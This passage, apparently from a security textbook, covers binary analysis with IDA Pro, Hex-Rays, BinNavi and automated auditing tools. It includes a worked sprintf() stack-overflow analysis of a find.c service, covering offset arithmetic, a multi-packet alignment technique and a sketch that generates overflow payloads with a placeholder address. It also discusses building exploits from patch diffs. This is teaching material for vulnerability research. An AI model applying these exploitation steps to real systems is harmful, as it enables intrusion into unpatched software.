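    "lib_func_a": [0x55, 0x89, 0xE5, 0x8B, 0x45, 0x08, 0xE8, None, None, None, None],
    "lib_func_b": [0x55, 0x89, 0xE5, 0x83, 0xEC, None, 0x8B, 0x45, 0x0C],
}


def matches(code, pattern):
    """True if code begins with pattern, treating None as a wildcard byte."""
    if len(code) < len(pattern):
        return False
    return all(p is None or p == b for p, b in zip(pattern, code))


def identify(code, signatures=SIGNATURES):
    """Return the name of the first signature that matches, or None."""
    for name, pattern in signatures.items():
        if matches(code, pattern):
            return name
    return None


unknown = bytes([0x55, 0x89, 0xE5, 0x83, 0xEC, 0x18, 0x8B, 0x45, 0x0C, 0x90])
print(identify(unknown))
```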
In addition to a straightforward disassembly listing, IDA contains a number of powerful
features that greatly enhance your ability to analyze a binary file. Some of these features
include
• Graphing capabilities to chart function relationships
• Flowcharting capabilities to chart function flow
• A strings window to display sequences of ASCII or Unicode characters
contained in the binary file
• A large database of common data structure layouts and function prototypes
• A powerful plug-in architecture that allows extensions to IDA’s capabilities to be
easily incorporated
• A scripting engine for automating many analysis tasks
• An integrated debugger
Using IDA Pro An IDA session begins when you select a binary file to analyze.
Figure 12-1 shows the initial analysis window displayed by IDA once a file has been
opened. Note that IDA has already recognized this particular file as a PE format
executable for Microsoft Windows and has chosen x86 as the processor type. When a file
is loaded into IDA, a significant amount of initial analysis takes place. IDA analyzes the
instruction sequence, assigning location names to all program addresses referred to by
jump or call instructions, and assigning data names to all program locations referred to
in data references. If symbol table information is present in the binary, IDA will utilize
names derived from the symbol table rather than automatically generated names.
IDA assigns global function names to all locations referenced by call instructions and
attempts to locate the end of each function by searching for corresponding return
instructions. A particularly impressive feature of IDA is its ability to track program stack
Figure 12-1 The IDA Pro file loading dialog
usage within each recognized function. In doing so, IDA builds an accurate picture of
the stack frame structure used by each function, including the precise layout of local
variables and function parameters. This is particularly useful when you want to determine
exactly how much data it will take to fill a stack allocated buffer and to overwrite a
saved return address. While source code can tell you how much space a programmer
requested for a local array, IDA can show you exactly how that array gets allocated at
runtime, including any compiler-inserted padding. Following initial analysis, IDA positions
the disassembly display at the program entry point as shown in Figure 12-2. This is
a typical function disassembly in IDA. The stack frame of the function is displayed first,
then the disassembly of the function itself.
By convention, IDA names local variables var_XXX, where XXX refers to the variable’s
negative offset within the stack relative to the stack frame pointer. Function parameters are
named arg_XXX, where XXX refers to the parameter’s positive offset within the stack relative
to the saved function return address. Note in Figure 12-2 that some of the local variables
are assigned more traditional names. IDA has determined that these particular variables are
used as parameters to known library functions and has assigned names to them based on
names used in API (application program interface) documentation for those functions’ prototypes.
You can also see how IDA can recognize references to string data and assign a variable
name to the string while displaying its content as an inline comment. Figure 12-3
shows how IDA replaces relatively meaningless call target addresses with much more meaningful
library function names. Additionally, IDA has inserted comments where it understands
the data types expected for the various parameters to each function.
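The default naming rule can be sketched in Python. This assumes a conventional 32-bit x86 frame in which the saved frame pointer and the return address each occupy 4 bytes, so that the first parameter sits at [ebp+8]. Numbering that first parameter arg_0 is our assumption about the convention, and the function name is illustrative.

```python
def stack_slot_name(ebp_offset, saved_frame_pointer=4, return_address=4):
    """Name a stack slot from its offset relative to EBP."""
    if ebp_offset < 0:
        # Locals live below the frame pointer: [ebp-608h] becomes var_608.
        return "var_%X" % -ebp_offset
    first_arg = saved_frame_pointer + return_address
    if ebp_offset >= first_arg:
        # Parameters are numbered from the first slot past the return address.
        return "arg_%X" % (ebp_offset - first_arg)
    raise ValueError("offset falls on the saved frame pointer or return address")


for offset in (-0x608, -4, 8, 0xC):
    print("%6d -> %s" % (offset, stack_slot_name(offset)))
```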
Figure 12-2 An IDA disassembly listing
Navigating an IDA Pro Disassembly Navigating your way around an IDA disassembly
is very simple. Holding the cursor over any address used as an operand causes
IDA to display a tool tip window that shows the disassembly at the operand address.
Double-clicking that same operand causes the disassembly window to jump to the associated
address. IDA maintains a history list to help you quickly back out to your original
disassembly address. The ESC key acts like the Back button in a web browser.
Making Sense of a Disassembly As you work your way through a disassembly
and determine what actions a function is carrying out or what purpose a variable serves,
you can easily change the names IDA has assigned to those functions or variables. To
rename any variable, function, or location, simply click the name you want to change,
and then use the Edit menu, or right-click for a context-sensitive menu to rename the
item to something more meaningful. Virtually every action in IDA has an associated
hotkey combination and it pays to become familiar with the ones you use most frequently.
The manner in which operands are displayed can also be changed via the Edit |
Operand Type menu. Numeric operands can be displayed as hex, decimal, octal, binary,
or character values. Contiguous blocks of data can be organized as arrays to provide
more compact and readable displays (Edit | Array). This is particularly useful when
Figure 12-3 IDA naming and commenting
organizing and analyzing stack frame layouts as shown in Figure 12-4 and Figure 12-5.
The stack frame for any function can be viewed in more detail by double-clicking any
stack variable reference in the function’s disassembly.
Finally, another useful feature is the ability to define structure templates and apply
those templates to data in the disassembly. Structures are declared in the structures
subview (View | Open Subviews | Structures), and applied using the Edit | Struct Var
menu option. Figure 12-6 shows two structures and their associated data fields.
Figure 12-4 IDA stack frame prior to type consolidation
Figure 12-5 IDA stack frame after type consolidation
Once a structure type has been applied to a block of data, disassembly references
within the block can be displayed using structure offset names, rather than more cryptic
numeric offsets. Figure 12-7 is a portion of a disassembly that makes use of IDA’s structure
declaration capability. The local variable sa has been declared as a sockaddr_in
struct, and the local variable hostent represents a pointer to a hostent structure.
NOTE The sockaddr_in and hostent data structures are used frequently in
C/C++ for network programming. A sockaddr_in describes an Internet
address, including host IP and port information. A hostent data structure is
used to return the results of a DNS lookup to a C/C++ program.
Disassemblies are made more readable when structure names are used rather than register
plus offset syntax. For comparison, the operand at location 0804A2C8 has been left
unaltered, while the same operand reference at location 0804A298 has been converted to
the structure offset style and is clearly more readable as a field within a hostent struct.
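The conversion from a numeric offset to a field name amounts to a table lookup. The Python sketch below assumes the usual 32-bit layout of struct hostent (five 4-byte fields). The operand syntax and the function name are illustrative and are not taken from IDA itself.

```python
import re

# Field offsets of struct hostent on a 32-bit platform (assumed layout).
HOSTENT_FIELDS = {
    0: "h_name",
    4: "h_aliases",
    8: "h_addrtype",
    12: "h_length",
    16: "h_addr_list",
}

# Matches operands such as [eax+4] or [eax+10h]; offsets are read as hex.
OPERAND = re.compile(r"\[(\w+)\+([0-9A-Fa-f]+)h?\]")


def apply_struct(operand, struct_name, fields):
    """Rewrite a register-plus-offset operand using structure field names."""
    match = OPERAND.fullmatch(operand)
    if match is None:
        return operand
    register, digits = match.groups()
    field = fields.get(int(digits, 16))
    if field is None:
        return operand  # offset does not start a known field
    return "[%s+%s.%s]" % (register, struct_name, field)


print(apply_struct("[eax+10h]", "hostent", HOSTENT_FIELDS))
```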
Vulnerability Discovery with IDA Pro The process of manually searching
for vulnerabilities using IDA Pro is similar in many respects to searching for vulnerabilities
in source code. A good start is to locate the places in which the program accepts
user-provided input, and then attempt to understand how that input is used. It is helpful if
IDA Pro has been able to identify calls to standard library functions. Because you are
reading through an assembly language listing, it is likely that your analysis will take far
longer than a corresponding read through source code. Use references for this activity,
Figure 12-6 IDA structure definition window
including appropriate assembly language reference manuals and a good guide to the
APIs for all recognized library calls. It will be important for you to understand the effect
of each assembly language instruction, as well as the requirements and results for calls
to library functions. An understanding of basic assembly language code sequences as
generated by common compilers is also essential. At a minimum, you should understand
the following:
• Function prologue code The first few statements of most functions used to
set up the function’s stack frame and allocate any local variables
• Function epilogue code The last few statements of most functions used to
clear the function’s local variables from the stack and restore the caller’s stack
frame
• Function calling conventions Dictate the manner in which parameters are
passed to functions and how those parameters are cleaned from the stack once
the function has completed
• Assembly language looping and branching primitives The instructions used
to transfer control to various locations within a function, often according to the
outcome of a conditional test
• High-level data structures How common data structures are laid out in memory and
which assembly language addressing modes are used to access them
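As one small example of recognizing such a sequence, the Python sketch below looks for the classic x86 prologue (push ebp; mov ebp, esp; sub esp, N) at the start of a function and reports how many bytes it reserves for local variables. The sample byte strings are made up for illustration, and real compilers often interleave register saves or omit the frame pointer entirely.

```python
# Both common encodings of "push ebp; mov ebp, esp".
FRAME_SETUP = (b"\x55\x89\xe5", b"\x55\x8b\xec")


def local_frame_size(code):
    """Return bytes reserved for locals by a standard prologue, else None."""
    if code[:3] not in FRAME_SETUP:
        return None
    rest = code[3:]
    if rest[:2] == b"\x83\xec" and len(rest) >= 3:
        # sub esp, imm8 (small positive sizes only in this sketch)
        return rest[2]
    if rest[:2] == b"\x81\xec" and len(rest) >= 6:
        # sub esp, imm32 stored little-endian
        return int.from_bytes(rest[2:6], "little")
    return 0  # frame pointer set up, but no locals allocated here


small = b"\x55\x89\xe5\x83\xec\x18"              # sub esp, 18h
large = b"\x55\x89\xe5\x81\xec\x08\x06\x00\x00"  # sub esp, 608h
print(local_frame_size(small), local_frame_size(large))
```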
Figure 12-7 Applying IDA structure templates
Finishing Up with find.c Let’s use IDA Pro to take a look at the sprintf() call that
was flagged by all of the auditing tools used in this chapter. IDA’s disassembly listing leading
up to the potentially vulnerable call at location 08049A8A is shown in Figure 12-8. In
the example, variable names have been assigned for clarity. We have this luxury because
we have seen the source code. If we had never seen the source code, we would be dealing
with more generic names assigned during IDA’s initial analysis.
It is perhaps stating the obvious at this point, but important nonetheless, to note that
we are looking at compiled C code. One reason we know this, aside from having peeked
at some of the source already, is that the program is linked against the C standard library.
An understanding of the C calling conventions helps us track down the parameters that
are being passed to sprintf() here. First, the prototype for sprintf() looks like this:
int sprintf(char *str, const char *format, ...);
The sprintf() function generates an output string based on a supplied format string
and optional data values to be embedded in the output string according to field specifications
within the format string. The destination character array is specified by the first
parameter, str. The format string is specified in the second parameter, format, and any
required data values are specified as needed following the format string. The security
problem with sprintf() is that it doesn’t perform length checking on the output string to
determine whether it will fit into the destination character array. Since we have compiled
C, we expect parameter passing to take place using the C calling conventions, which specify
that parameters to a function call are pushed onto the stack in right-to-left order.
Figure 12-8 A potentially vulnerable call to sprintf()
This means that the first parameter to sprintf(), str, is pushed onto the stack last. To track
down the parameters supplied to this sprintf() call, we need to work backwards from the
call itself. Each push statement that we encounter is placing an additional parameter onto
the stack. We can observe six push statements following the previous call to sprintf() at
location 08049A59. The values associated with each push (in reverse order) are
str: cmd
format: "find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s"
string1: init_cwd
string2: filename
string3: keyword
string4: outf
Strings 1 through 4 represent the four string parameters expected by the format string.
The lea (Load Effective Address) instructions at locations 08049A64, 08049A77, and
08049A83 in Figure 12-8 compute the address of the variables outf, init_cwd, and cmd
respectively. This lets us know that these three variables are character arrays, while the
fact that filename and keyword are used directly lets us know that they are character
pointers. To exploit this function call, we need to know if this sprintf() call can be made
to generate a string not only larger than the size of the cmd array, but also large enough
to reach the saved return address on the stack. Double-clicking any of the variables just
named will bring up the stack frame window for the manage_request() function
(which contains this particular sprintf() call) centered on the variable that was clicked.
The stack frame is displayed in Figure 12-9 with appropriate names applied and array
aggregation already complete.
Figure 12-9 indicates that the cmd buffer is 512 bytes long and that the 1032-byte
init_cwd buffer lies between cmd and the saved return address at offset 00000004. Simple
math tells us that we need sprintf() to write 1552 bytes (512 for cmd, 1032 bytes for
init_cwd, 4 bytes for the saved frame pointer, and 4 bytes for the saved return address) of
Figure 12-9 The relevant stack arguments for sprintf()
data into cmd in order to completely overwrite the return address. The sprintf() call we
are looking at decompiles into the following C statement:
sprintf(cmd,
"find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s",
init_cwd, filename, keyword, outf);
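The stack arithmetic is easy to check with a short Python sketch. The sizes come from Figure 12-9 as described in the text; the field names for the saved frame pointer and return address, and the helper names, are ours.

```python
# Frame layout from Figure 12-9, ordered from cmd toward higher addresses.
FRAME = [
    ("cmd", 512),
    ("init_cwd", 1032),
    ("saved_frame_pointer", 4),
    ("saved_return_address", 4),
]


def offset_of(frame, name):
    """Distance in bytes from the start of the first field to the named one."""
    offset = 0
    for field, size in frame:
        if field == name:
            return offset
        offset += size
    raise KeyError(name)


def bytes_to_cover(frame, name):
    """Bytes that must be written from the first field to fill the named one."""
    return offset_of(frame, name) + dict(frame)[name]


print(offset_of(FRAME, "saved_return_address"))
print(bytes_to_cover(FRAME, "saved_return_address"))
```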
We will cheat a bit here and rely on our earlier analysis of the find.c source code to
remember that the filename and keyword parameters are pointers to user-supplied
strings from an incoming UDP packet. Long strings supplied to either filename or keyword
should get us a buffer overflow. Without access to the source code, we would need
to determine where each of the four string parameters obtains its value. This is simply a
matter of doing a little additional tracing through the manage_request() function.
Exactly how long does a filename need to be to overwrite the saved return address? The
answer is somewhat less than the 1552 bytes mentioned earlier, because there are output
characters sent to the cmd buffer prior to the filename parameter. The format string
itself contributes 13 characters prior to writing the filename into the output buffer, and
the init_cwd string also precedes the filename. The following code from elsewhere in
manage_request() shows how init_cwd gets populated:
.text:08049A12 push 1024
.text:08049A17 lea eax, [ebp+init_cwd]
.text:08049A1D push eax
.text:08049A1E call _getcwd
We see that the absolute path of the current working directory is copied into init_cwd,
and we receive a hint that the declared length of init_cwd is actually 1024 bytes, rather
than 1032 bytes as Figure 12-9 seems to indicate. The difference is because IDA displays
the actual stack layout as generated by the compiler, which occasionally includes padding
for various buffers. Using IDA allows you to see the exact layout of the stack frame,
while viewing the source code only shows you the suggested layout. How does the value
of init_cwd affect our attempt at overwriting the saved return address? We may not
always know what directory the find application has been started from, so we can’t
always predict how long the init_cwd string will be. We need to overwrite the saved
return address with the address of our shellcode, so our shellcode offset needs to be
included in the long filename argument that we will use to cause the buffer overflow. We
need to know the length of init_cwd in order to properly align our offset within the filename.
Since we don’t know it, can the vulnerability be reliably exploited? The answer is
to first include many copies of our offset to account for the unknown length of init_cwd
and, second, to conduct the attack in four separate UDP packets in which the byte alignment
of the filename is shifted by one byte in each successive packet. One of the four
packets is guaranteed to be aligned to properly overwrite the saved return address.
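The alignment argument can be checked with a little Python. This sketch models only the layout arithmetic: the 13 characters of format text and the init_cwd string precede the filename, and the saved return address begins 1548 bytes into cmd. The repeated 4-byte value is a placeholder rather than a real address, and the sketch ignores other constraints, such as bytes that cannot appear in the string.

```python
RET_OFFSET = 512 + 1032 + 4                  # start of saved return address
PREFIX_LEN = len("find ") + len(' -name "')  # 13 characters before filename
PLACEHOLDER = 0x41424344                     # stand-in for the real value


def required_shift(cwd_len):
    """Padding (0 to 3 bytes) that lines a repeated word up with the target."""
    return (RET_OFFSET - (PREFIX_LEN + cwd_len)) % 4


def build_filenames(value=PLACEHOLDER, copies=400):
    """One candidate filename per possible byte alignment."""
    word = value.to_bytes(4, "little")
    return [b"X" * shift + word * copies for shift in range(4)]


def overwrites_return(filename, cwd_len, value=PLACEHOLDER):
    """True if the modeled output places value exactly on the return address."""
    output = b"." * (PREFIX_LEN + cwd_len) + filename
    return output[RET_OFFSET:RET_OFFSET + 4] == value.to_bytes(4, "little")


for cwd_len in (5, 6, 7, 8):
    hits = [overwrites_return(name, cwd_len) for name in build_filenames()]
    print(cwd_len, required_shift(cwd_len), hits)
```

Whatever the length of init_cwd, exactly one of the four candidates lands on the return address, which is why sending all four removes the need to know the directory in advance.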
Decompilation with Hex-Rays A recent development in the decompilation
field is Ilfak’s Hex-Rays plug-in for IDA Pro. In beta testing at the time of this writing,
Hex-Rays integrates with IDA Pro to form a very powerful disassembly/decompilation
duo. The goal of Hex-Rays is not to generate source code that is ready to compile. Rather,
the goal is to produce source code that is sufficiently readable that analysis becomes
significantly easier than disassembly analysis. Sample Hex-Rays output is shown in the
following listing, which contains the previously discussed portions of the
manage_request() function from the find binary.
char v59; // [sp+10290h] [bp-608h]@76
sprintf(&v59, "find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s",
&v57, v43, buf, &v58);
system(&v59);
While the variable names may not make things obvious, we can see that variable v59 is the
destination array for the sprintf() function. Furthermore, by observing the declaration of
v59, we can see that the array begins 608h (1544) bytes below the saved frame pointer (the
512 bytes of cmd plus the 1032 bytes of init_cwd), which agrees precisely with the analysis
presented earlier. We know the stack frame layout based
on the Hex-Rays-generated comment that indicates that v59 resides at memory location
[bp-608h]. Hex-Rays integrates seamlessly with IDA Pro and offers interactive manipulation
of the generated source code in much the same way that the IDA-generated disassembly
can be manipulated.
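The frame offset can be pulled out of such a comment mechanically. The Python sketch below parses the [bp-608h] annotation from the listing above and compares it with the buffer sizes found earlier. The regular expression reflects only the comment format shown here and is not a documented Hex-Rays interface.

```python
import re


def frame_offset(declaration):
    """Return the signed offset from the frame pointer named in the comment."""
    match = re.search(r"\[bp([+-])([0-9A-Fa-f]+)h\]", declaration)
    if match is None:
        raise ValueError("no frame pointer annotation found")
    sign, digits = match.groups()
    value = int(digits, 16)
    return -value if sign == "-" else value


DECLARATION = "char v59; // [sp+10290h] [bp-608h]@76"
offset = frame_offset(DECLARATION)
print(offset, -offset == 512 + 1032)
```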
BinNavi
Disassembly listings for complex programs can become very difficult to follow because
program listings are inherently linear, while programs are very nonlinear as a result of all
of the branching operations that they perform. BinNavi from SABRE Security is a tool that
provides for graph-based analysis and debugging of binaries. BinNavi operates on
IDA-generated databases by importing them into a SQL database (MySQL is currently supported),
and then offering sophisticated graph-based views of the binary. BinNavi utilizes
the concept of proximity browsing to prevent the display from becoming too cluttered.
BinNavi graphs rely heavily on the concept of the basic block. A basic block is a sequence of
instructions that, once entered, is guaranteed to execute in its entirety. The first instruction
in any basic block is generally the target of a jump or call instruction, while the last
instruction in a basic block is typically either a jump or return. Basic blocks provide a convenient
means for grouping instructions together in graph-based viewers, as each block
can be represented by a single node within a function’s flowgraph. Figure 12-10 shows a
selected basic block and its immediate neighbors.
The selected node has a single parent and two children. The proximity settings for this
view are one node up and one node down. The proximity distance is configurable
within BinNavi, allowing users to see more or less of a binary at any given time. Each
time a new node is selected, the BinNavi display is updated to show only the neighbors
that meet the proximity criteria. The goal of the BinNavi display is to decompose complex
functions sufficiently to allow analysts to quickly comprehend the flow of
those functions.
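Both ideas, basic blocks and proximity browsing, can be sketched in Python. The instruction tuples and the tiny sample function below are invented for illustration, and this is not how BinNavi itself is implemented. A block starts at the first instruction, at any branch target, and at any instruction that follows a jump or return.

```python
def split_basic_blocks(instructions):
    """Group (address, mnemonic, branch_target) tuples into basic blocks."""
    leaders = {instructions[0][0]}
    for index, (address, mnemonic, target) in enumerate(instructions):
        if mnemonic.startswith("j") or mnemonic == "ret":
            if target is not None:
                leaders.add(target)
            if index + 1 < len(instructions):
                leaders.add(instructions[index + 1][0])
    blocks = []
    for instruction in instructions:
        if instruction[0] in leaders or not blocks:
            blocks.append([])
        blocks[-1].append(instruction)
    return blocks


def proximity(edges, node, up=1, down=1):
    """Nodes within `up` parent hops and `down` child hops of node."""
    parents = {}
    for source, targets in edges.items():
        for target in targets:
            parents.setdefault(target, []).append(source)
    visible = {node}
    for table, hops in ((parents, up), (edges, down)):
        frontier = {node}
        for _ in range(hops):
            frontier = {n for f in frontier for n in table.get(f, ())}
            visible |= frontier
    return visible


# Hypothetical function: a conditional branch with two paths that rejoin.
SAMPLE = [
    (0x00, "cmp", None), (0x02, "jz", 0x08),
    (0x04, "mov", None), (0x06, "jmp", 0x0A),
    (0x08, "xor", None),
    (0x0A, "ret", None),
]
EDGES = {0x00: [0x04, 0x08], 0x04: [0x0A], 0x08: [0x0A], 0x0A: []}

print([block[0][0] for block in split_basic_blocks(SAMPLE)])
print(sorted(proximity(EDGES, 0x04)))
```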
References
JRevPro http://sourceforge.net/projects/jrevpro/
Jad www.kpdus.com/jad.html
decompyle www.crazy-compilers.com/decompyle/
IDA Pro www.datarescue.com/idabase/
Hex-Rays www.hexblog.com/
BinNavi http://sabre-security.com/
Pentium References www.intel.com/design/Pentium4/documentation.htm#man
Automated Binary Analysis Tools
To automatically audit a binary for potential vulnerabilities, any tool must first understand
the executable file format used by the binary, be able to parse the machine language
instructions contained within the binary, and finally determine whether the
binary performs any actions that might be exploitable. Such tools are far more specialized
than source code auditing tools. For example, C source code can be automatically
scanned no matter what target architecture the code is ultimately compiled for; whereas
binary auditing tools will need a separate module for each executable file format they
Figure 12-10 Example BinNavi display
are capable of interpreting, as well as a separate module for each machine language they
can recognize. Additionally, the high-level language used to write the application and
the compiler used to compile it can each influence what the compiled code looks like.
Compiled C/C++ source code looks very different from compiled Delphi or Java code.
The same source code compiled with two different compilers may possess many similarities
but will also possess many differences.
The major challenge for such products centers on the ability to accurately characterize
behavior that leads to an exploitable condition. Examples of such behaviors include access
outside of allocated memory (whether in the stack or the heap), use of uninitialized variables,
or passing user input directly to dangerous functions. To accomplish any of these
tasks, an automated tool must be able to accurately compute ranges of values taken on by
index variables and pointers, follow the flow of user-input values as they are used within the
program, and track the initialization of all variables referenced by the program. Finally, to
be truly effective, automated vulnerability discovery tools must be able to perform each of
these tasks reliably while dealing with the many different algorithmic implementations
used by both programmers and their compilers. Suffice it to say there have not been many
entries into this holy grail of markets, and of those, most have been priced out of the average
user’s hands.
We will briefly discuss three different tools that perform some form of automated
binary analysis. Each of these tools takes a radically different approach to its analysis,
which serves to illustrate the difficulty with automated analysis in general. The three tools
are Halvar Flake’s BugScam, Tyler Durden’s Chevarista, and BinDiff from SABRE Security.
BugScam
An early entry in this space, BugScam is a collection of scripts by Halvar Flake for use with
IDA Pro, the Interactive Disassembler Professional from DataRescue. Two of the powerful
features of IDA are its scripting capabilities and its plug-in architecture. Both of these features
allow users to extend the capabilities of IDA and take advantage of the extensive
analysis that IDA performs on target binaries. Similar to the source code tools discussed
earlier, BugScam scans for potentially insecure uses of functions that often lead to exploitable
conditions. Unlike most of the source code scanners, BugScam attempts to perform
some rudimentary data flow analysis to determine whether the function calls it identifies
are actually exploitable. BugScam generates an HTML report containing the virtual
addresses at which potential problems exist. Because the scripts are run from within IDA
Pro, it is a relatively easy task to navigate to each trouble spot for further analysis on
whether the indicated function calls are actually exploitable. The BugScam scripts leverage
the powerful analysis capabilities of IDA Pro, which is capable of recognizing a large number
of executable file formats, as well as many machine languages.
Sample BugScam output for the compiled find.c binary appears next:
Code Analysis Report for find
This is an automatically generated report on the frequency of misuse of
certain known-to-be-problematic library functions in the executable file
find. The contents of this file are automatically generated using simple
heuristics, thus any reliance on the correctness of the statements in
this file is your own responsibility.
General Summary
A total number of 7 library functions were analyzed. Counting all
detectable uses of these library calls, a total of 3 was analyzed, of
which 1 were identified as problematic.
The complete list of problems
Results for .sprintf
The following table summarizes the results of the analysis of calls to
the function .sprintf.
Address Severity Description
8049a8a 5 The maximum expansion of the data appears to be
larger than the target buffer, this might be the
cause of a buffer overrun !
Maximum Expansion: 1587 Target Size: 512
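The kind of check reported above can be approximated with a simple upper bound. The Python sketch below is our own illustration and not BugScam's actual algorithm: it does not attempt to reproduce the 1587 figure, it handles only %s conversions, and the source buffer sizes passed in are hypothetical.

```python
import re

FIND_FORMAT = r'find %s -name "%s" -exec grep -H -n %s \{\} \; > %s'


def max_expansion(fmt, source_sizes):
    """Upper bound on sprintf output, including the terminating NUL.

    source_sizes gives the buffer size behind each %s, or None if unknown.
    Returns None when any source is unbounded.
    """
    literal = len(re.sub(r"%s", "", fmt))
    if any(size is None for size in source_sizes):
        return None
    # A buffer of n bytes holds at most n - 1 characters plus its terminator.
    return literal + sum(size - 1 for size in source_sizes) + 1


def is_suspect(fmt, source_sizes, target_size):
    """Flag the call if the bound is unknown or exceeds the destination."""
    bound = max_expansion(fmt, source_sizes)
    return bound is None or bound > target_size


# Hypothetical source sizes: a 1024-byte directory buffer and three short ones.
print(max_expansion(FIND_FORMAT, [1024, 16, 16, 16]))
print(is_suspect(FIND_FORMAT, [1024, 16, 16, 16], 512))
```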
Chevarista
In issue 64 of Phrack, in an article entitled “Automated vulnerability auditing in machine
code,” Tyler Durden introduced a tool named Chevarista. Chevarista is a proof-of-concept
binary analysis tool implemented for the analysis of SPARC binaries. The tool is only
available upon request from its author. The significant feature of the article is that it presents
program analysis in a very formal manner and details the ways in which control flow
analysis and data flow analysis can be combined to recognize flaws in compiled software.
Some of the capabilities of Chevarista include interval analysis, which is used to deduce
the range of values that variables can take on at runtime and allows the user to recognize
out of range memory accesses; and state checking, which the author utilizes to detect
memory leaks and double free conditions. The article’s primary purpose is to present formal
program analysis theory in a traditionally non-formal venue in the hopes of sparking
interest in this type of analysis. For more information, readers are invited to review follow-on
work on the ERESI Reverse Engineering Software Interface.
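To give a feel for interval analysis, the following minimal sketch tracks the range of values an index variable can take and checks whether an array access stays inside its buffer. It is not taken from Chevarista; the Interval class and the access_in_bounds helper are hypothetical names used only for illustration.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Interval:
    lo: int
    hi: int

    def __add__(self, other):
        # Range of x + y when x is in self and y is in other
        return Interval(self.lo + other.lo, self.hi + other.hi)

    def scale(self, k):
        # Range of k * x; assumes k is a non-negative constant
        return Interval(self.lo * k, self.hi * k)

def access_in_bounds(index, elem_size, buf_size):
    """True if every byte touched by buf[index] lies inside the buffer."""
    offsets = index.scale(elem_size)
    return offsets.lo >= 0 and offsets.hi + elem_size <= buf_size
```

If i is known to lie in Interval(0, 15), an access to a 16-element array of 4-byte integers (64 bytes) is in bounds, while the access buf[i + 1], whose index lies in Interval(1, 16), is flagged because it can touch bytes 64 through 67.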
BinDiff
An alternative approach to locating vulnerabilities is to allow vendors to locate and fix
the vulnerabilities themselves, and then, in the wake of a patch, to study exactly what
has changed in the patched program. Under the assumption that patches either add
completely new functionality or fix broken functionality, it can be useful to analyze each
change to determine if the modification addresses a vulnerable condition. By studying
any safety checks implemented in the patch, it is possible to understand what types of
malformed input might lead to exploits in the unpatched program. This can lead to the
rapid development of exploits against unpatched systems. It is not uncommon to see
exploits developed within 24 hours of the release of a vendor patch. Searching for vulnerabilities
that have already been patched may not seem like the optimal way to spend
your valuable research time, so what is the point of difference analysis? The first reason
is simply to be able to develop proof-of-concept exploits for use in pen-testing against
unpatched clients. The second reason is to discover use patterns in vulnerable software
in order to locate identical patterns that a vendor may have forgotten to patch. In this
second case, you are leveraging the fact that the vendor has pointed out what they were
doing wrong, and all that is left is for you to determine whether they have found and
fixed all instances of their wrongful behavior.
BinDiff from SABRE Security is a tool that aims to speed up the process of locating
and understanding changes introduced in patched binary files. Rather than scanning
individual binaries for potential vulnerabilities, BinDiff, as its name implies, displays
the differences between two versions of the same binary. You may think to yourself, “so
what?” Simple tools such as diff or cmp can display the differences between two files as
well. What makes those tools less than useful for comparing two compiled binaries is
that diff is primarily useful for comparing text files, and cmp can provide no contextual
information surrounding any differences. BinDiff, on the other hand, focuses less on
individual byte changes and more on structural or behavioral changes between successive
versions of the same program. BinDiff combines disassembly with graph comparison
algorithms to compare the control flow graphs of successive versions of functions
and highlights the newly introduced code in a display format similar to that of BinNavi.
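The idea of comparing structure rather than bytes can be sketched in a few lines. The example below is not BinDiff's algorithm; it simply summarizes each function by the shape of its control flow graph and reports functions whose summary changed between two versions. It assumes functions can be paired by name, which will not hold for stripped binaries, and all names in it are hypothetical.

```python
def fingerprint(cfg, calls):
    """Summarize a function as (basic blocks, edges, call count).

    cfg maps each basic block label to the list of its successor labels.
    """
    edges = sum(len(succs) for succs in cfg.values())
    return (len(cfg), edges, calls)

def changed_functions(old, new):
    """Names present in both versions whose fingerprints differ."""
    return sorted(
        name for name in old.keys() & new.keys()
        if fingerprint(*old[name]) != fingerprint(*new[name])
    )

# Hypothetical data: the patched parse() gains a block "C" (a new check).
old = {"parse": ({"A": ["B"], "B": []}, 1), "init": ({"A": []}, 0)}
new = {"parse": ({"A": ["C", "B"], "C": ["B"], "B": []}, 1),
       "init": ({"A": []}, 0)}
```

Here changed_functions(old, new) returns ['parse']. A patch that adds a safety check typically adds basic blocks and edges, so even this crude summary points the analyst at the modified function.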
References
Chevarista www.phrack.org/issues.html?issue=64&id=8
BugScam http://sourceforge.net/projects/bugscam
ERESI http://eresi.asgardlabs.org/
BinNavi http://sabre-security.com/
Chapter 12: Passive Analysis
PART IV
CHAPTER 13 Advanced Static Analysis with IDA Pro
In this chapter you will be introduced to additional features of IDA Pro that will help
you analyze binary code more efficiently and with greater confidence.
• What makes IDA so good?
• Binary analysis challenges
• Dealing with stripped binaries
• Dealing with statically linked binaries
• Understanding the memory layout of structures and classes
• Basic structure of compiled C++ code
• The IDC scripting language
• Introduction to IDA plug-ins
• Introduction to IDA loader and processor modules
Out of the box, IDA Pro is already one of the most powerful binary analysis tools available.
The range of processors and binary file formats that IDA can process is more than
many users will ever need. Likewise, the disassembly view provides all of the capability
that the majority of users will ever want. Occasionally, however, a binary will be sufficiently
sophisticated or complex that you will need to take advantage of IDA’s advanced
features in order to fully comprehend what the binary does. In other cases, you may find
that IDA does a large percentage of what you wish to do, and you would like to pick up
from there with additional automated processing. In this chapter, we examine some of
the challenges faced in binary analysis and how IDA may be used to overcome them.
Static Analysis Challenges
For any nontrivial binary, generally several challenges must be overcome to make analysis
of that binary less difficult. Examples of challenges you might encounter include
• Binaries that have been stripped of some or all of their symbol information
• Binaries that have been linked with static libraries
• Binaries that make use of complex, user-defined data structures
• Compiled C++ programs that make use of polymorphism
• Binaries that have been obfuscated in some manner to hinder analysis
• Binaries that use instruction sets with which IDA is not familiar
• Binaries that use file formats with which IDA is not familiar
IDA is equipped to deal with all of these challenges to varying degrees, though its documentation
may not indicate that. One of the first things you need to learn to accept as an
IDA user is that there is no user’s manual and the help files are pretty terse. Familiarize
yourself with the available online IDA resources as, aside from your own hunting
around and poking at IDA, they will be your primary means of answering questions.
Some sites that have strong communities of IDA users include openrce.org and the IDA
support boards at DataRescue.
Stripped Binaries
The process of building software generally consists of several phases. In a typical C/C++
environment, you will encounter at a minimum the preprocessor, compilation, and
linking phases before an executable can be produced. For follow-on phases to correctly
combine the results of previous phases, intermediate files often contain information
specific to the next build phase. For example, the compiler embeds into object files a lot
of information that is specifically designed to assist the linker in doing its job of combining
those object files into a single executable or library. Among other things, this
information includes the names of all of the functions and global variables within the
object file. Once the linker has done its job, however, this information is no longer necessary.
Quite frequently, all of this information is carried forward by the linker and
